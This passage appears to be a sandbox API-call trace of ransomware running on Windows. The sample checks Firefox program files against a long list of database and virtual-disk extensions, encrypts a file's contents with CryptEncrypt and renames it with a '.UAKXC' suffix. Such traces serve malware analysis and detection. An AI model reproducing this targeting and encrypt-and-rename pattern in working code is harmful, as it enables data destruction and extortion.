[0139.781] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".ckp") returned 0x0 [0139.781] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".cma") returned 0x0 [0139.781] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".cpd") returned 0x0 [0139.781] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".dacpac") returned 0x0 [0139.781] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".dad") returned 0x0 [0139.781] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".dadiagrams") returned 0x0 [0139.781] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".daschema") returned 0x0 [0139.781] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".db") returned 0x0 [0139.781] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".db-shm") returned 0x0 [0139.781] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".db-wal") returned 0x0 [0139.782] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".db3") returned 0x0 [0139.782] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".dbc") returned 0x0 [0139.782] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".dbf") returned 0x0 [0139.782] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".dbs") returned 0x0 [0139.782] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".dbt") returned 0x0 [0139.782] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".dbv") returned 0x0 [0139.782] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".dbx") returned 0x0 [0139.782] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".dcb") returned 0x0 [0139.782] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".dct") returned 0x0 [0139.782] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".dcx") returned 0x0 [0139.782] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".ddl") returned 0x0 [0139.782] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".dlis") returned 0x0 [0139.782] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".dp1") returned 0x0 [0139.782] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".dqy") returned 0x0 [0139.782] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".dsk") returned 0x0 [0139.782] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".dsn") returned 0x0 [0139.782] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".dtsx") returned 0x0 [0139.782] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".dxl") returned 0x0 [0139.782] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".eco") returned 0x0 [0139.782] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".ecx") returned 0x0 [0139.782] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".edb") returned 0x0 [0139.782] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".epim") returned 0x0 [0139.782] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".exb") returned 0x0 [0139.782] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".fcd") returned 0x0 [0139.783] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".fdb") returned 0x0 [0139.783] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".fic") returned 0x0 [0139.783] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".fmp") returned 0x0 [0139.783] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".fmp12") returned 0x0 [0139.783] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".fmpsl") returned 0x0 [0139.783] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".fol") returned 0x0 [0139.783] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".fp3") returned 0x0 [0139.783] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".fp4") returned 0x0 [0139.783] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".fp5") returned 0x0 [0139.783] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".fp7") returned 0x0 [0139.783] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".fpt") returned 0x0 [0139.783] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".frm") returned 0x0 [0139.783] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".gdb") returned 0x0 [0139.783] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".grdb") returned 0x0 [0139.783] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".gwi") returned 0x0 [0139.783] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".hdb") returned 0x0 [0139.783] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".his") returned 0x0 [0139.783] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".ib") returned 0x0 [0139.783] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".idb") returned 0x0 [0139.784] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".ihx") returned 0x0 [0139.784] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".itdb") returned 0x0 [0139.784] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".itw") returned 0x0 [0139.784] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".jet") returned 0x0 [0139.784] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".jtx") returned 0x0 [0139.784] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".kdb") returned 0x0 [0139.784] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".kexi") returned 0x0 [0139.784] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".kexic") returned 0x0 [0139.784] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".kexis") returned 0x0 [0139.784] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".lgc") returned 0x0 [0139.784] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".lwx") returned 0x0 [0139.784] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".maf") returned 0x0 [0139.784] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".maq") returned 0x0 [0139.784] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".mar") returned 0x0 [0139.784] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".mas") returned 0x0 [0139.784] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".mav") returned 0x0 [0139.784] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".mdb") returned 0x0 [0139.785] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".mdf") returned 0x0 [0139.785] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".mpd") returned 0x0 [0139.785] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".mrg") returned 0x0 [0139.785] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".mud") returned 0x0 [0139.785] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".mwb") returned 0x0 [0139.785] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".myd") returned 0x0 [0139.785] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".ndf") returned 0x0 [0139.785] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".nnt") returned 0x0 [0139.785] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".nrmlib") returned 0x0 [0139.785] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".ns2") returned 0x0 [0139.785] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".ns3") returned 0x0 [0139.785] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".ns4") returned 0x0 [0139.785] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".nsf") returned 0x0 [0139.785] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".nv") returned 0x0 [0139.785] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".nv2") returned 0x0 [0139.785] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".nwdb") returned 0x0 [0139.785] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".nyf") returned 0x0 [0139.785] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".odb") returned 0x0 [0139.785] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".oqy") returned 0x0 [0139.785] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".orx") returned 0x0 [0139.785] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".owc") returned 0x0 [0139.786] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".p96") returned 0x0 [0139.786] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".p97") returned 0x0 [0139.786] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".pan") returned 0x0 [0139.786] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".pdb") returned 0x0 [0139.786] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".pdm") returned 0x0 [0139.786] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".pnz") returned 0x0 [0139.786] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".qry") returned 0x0 [0139.786] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".qvd") returned 0x0 [0139.786] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".rbf") returned 0x0 [0139.786] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".rctd") returned 0x0 [0139.786] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".rod") returned 0x0 [0139.786] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".rodx") returned 0x0 [0139.786] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".rpd") returned 0x0 [0139.786] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".rsd") returned 0x0 [0139.786] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".sas7bdat") returned 0x0 [0139.786] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".sbf") returned 0x0 [0139.786] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".scx") returned 0x0 [0139.786] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".sdb") returned 0x0 [0139.786] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".sdc") returned 0x0 [0139.787] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".sdf") returned 0x0 [0139.787] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".sis") returned 0x0 [0139.787] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".spq") returned 0x0 [0139.787] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".sql") returned 0x0 [0139.787] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".sqlite") returned 0x0 [0139.787] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".sqlite3") returned 0x0 [0139.787] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".sqlitedb") returned 0x0 [0139.787] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".te") returned 0x0 [0139.787] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".temx") returned 0x0 [0139.787] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".tmd") returned 0x0 [0139.787] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".tps") returned 0x0 [0139.787] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".trc") returned 0x0 [0139.787] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".trm") returned 0x0 [0139.787] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".udb") returned 0x0 [0139.787] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".udl") returned 0x0 [0139.787] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".usr") returned 0x0 [0139.787] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".v12") returned 0x0 [0139.787] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".vis") returned 0x0 [0139.787] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".vpd") returned 0x0 [0139.788] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".vvv") returned 0x0 [0139.788] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".wdb") returned 0x0 [0139.788] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".wmdb") returned 0x0 [0139.788] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".wrk") returned 0x0 [0139.788] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".xdb") returned 0x0 [0139.788] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".xld") returned 0x0 [0139.788] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".xmlff") returned 0x0 [0139.788] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".abcddb") returned 0x0 [0139.788] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".abs") returned 0x0 [0139.788] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".abx") returned 0x0 [0139.788] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".accdw") returned 0x0 [0139.788] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".adn") returned 0x0 [0139.788] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".db2") returned 0x0 [0139.788] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".fm5") returned 0x0 [0139.788] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".hjt") returned 0x0 [0139.788] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".icg") returned 0x0 [0139.788] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".icr") returned 0x0 [0139.788] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".kdb") returned 0x0 [0139.788] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".lut") returned 0x0 [0139.788] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".maw") returned 0x0 [0139.789] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".mdn") returned 0x0 [0139.789] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".mdt") returned 0x0 [0139.789] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".vdi") returned 0x0 [0139.789] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".vhd") returned 0x0 [0139.789] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".vmdk") returned 0x0 [0139.789] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".pvm") returned 0x0 [0139.789] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".vmem") returned 0x0 [0139.789] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".vmsn") returned 0x0 [0139.789] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".vmsd") returned 0x0 [0139.789] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".nvram") returned 0x0 [0139.789] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".vmx") returned 0x0 [0139.789] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".raw") returned 0x0 [0139.789] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".qcow2") returned 0x0 [0139.789] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".subvol") returned 0x0 [0139.789] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".bin") returned 0x0 [0139.789] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".vsv") returned 0x0 [0139.789] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".avhd") returned 0x0 [0139.789] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".vmrs") returned 0x0 [0139.789] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".vhdx") returned 0x0 [0139.790] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".avdx") returned 0x0 [0139.790] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".vmcx") returned 0x0 [0139.790] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpSrch=".iso") returned 0x0 [0139.790] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.790] WriteFile (in: hFile=0x210, lpBuffer=0x383fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x383fc78, lpOverlapped=0x0 | out: lpBuffer=0x383fd70*, lpNumberOfBytesWritten=0x383fc78*=0x20c, lpOverlapped=0x0) returned 1 [0139.806] WriteFile (in: hFile=0x210, lpBuffer=0x383fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x383fc7c, lpOverlapped=0x0 | out: lpBuffer=0x383fc80*, lpNumberOfBytesWritten=0x383fc7c*=0xa, lpOverlapped=0x0) returned 1 [0139.806] SetEndOfFile (hFile=0x210) returned 1 [0139.807] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.807] ReadFile (in: hFile=0x210, lpBuffer=0x4610000, nNumberOfBytesToRead=0x63, lpNumberOfBytesRead=0x383fc88, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesRead=0x383fc88*=0x63, lpOverlapped=0x0) returned 1 [0139.807] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0xffffff9d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.807] WriteFile (in: hFile=0x210, lpBuffer=0x4610000*, nNumberOfBytesToWrite=0x63, lpNumberOfBytesWritten=0x383fc44, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesWritten=0x383fc44*=0x63, lpOverlapped=0x0) returned 1 [0139.807] CloseHandle (hObject=0x210) returned 1 [0139.823] GetProcessHeap () returned 0xea0000 [0139.823] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0xef06f0 [0139.823] lstrcpyW (in: lpString1=0xef06f0, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list") returned="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list" [0139.823] lstrcatW (in: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list", lpString2=".UAKXC" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list.UAKXC") returned="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list.UAKXC" [0139.823] MoveFileW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list" (normalized: "c:\\program files (x86)\\mozilla firefox\\dependentlibs.list"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\dependentlibs.list.UAKXC" (normalized: "c:\\program files (x86)\\mozilla firefox\\dependentlibs.list.uakxc")) returned 1 [0139.825] GetProcessHeap () returned 0xea0000 [0139.825] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef06f0 | out: hHeap=0xea0000) returned 1 [0139.825] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedda10 | out: hHeap=0xea0000) returned 1 [0139.825] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecf18 | out: hHeap=0xea0000) returned 1 [0139.825] CryptGenRandom (in: hProv=0xeced80, dwLen=0x20, pbBuffer=0x383fd50 | out: pbBuffer=0x383fd50) returned 1 [0139.825] CryptGenRandom (in: hProv=0xeced80, dwLen=0x8, pbBuffer=0x383fd48 | out: pbBuffer=0x383fd48) returned 1 [0139.825] CryptEncrypt (in: hKey=0xececd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x200) returned 1 [0139.826] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\install.log" (normalized: "c:\\program files (x86)\\mozilla firefox\\install.log")) returned 0x20 [0139.827] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\install.log" (normalized: "c:\\program files (x86)\\mozilla firefox\\install.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0139.827] GetLastError () returned 0x0 [0139.827] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x383fc88 | out: lpFileSize=0x383fc88*=23274) returned 1 [0139.827] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".4dd") returned 0x0 [0139.828] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".4dl") returned 0x0 [0139.828] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".accdb") returned 0x0 [0139.828] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".accdc") returned 0x0 [0139.828] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".accde") returned 0x0 [0139.828] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".accdr") returned 0x0 [0139.828] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".accdt") returned 0x0 [0139.828] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\install.log", lpSrch=".accft") returned 0x0 [0139.828] StrStrIW 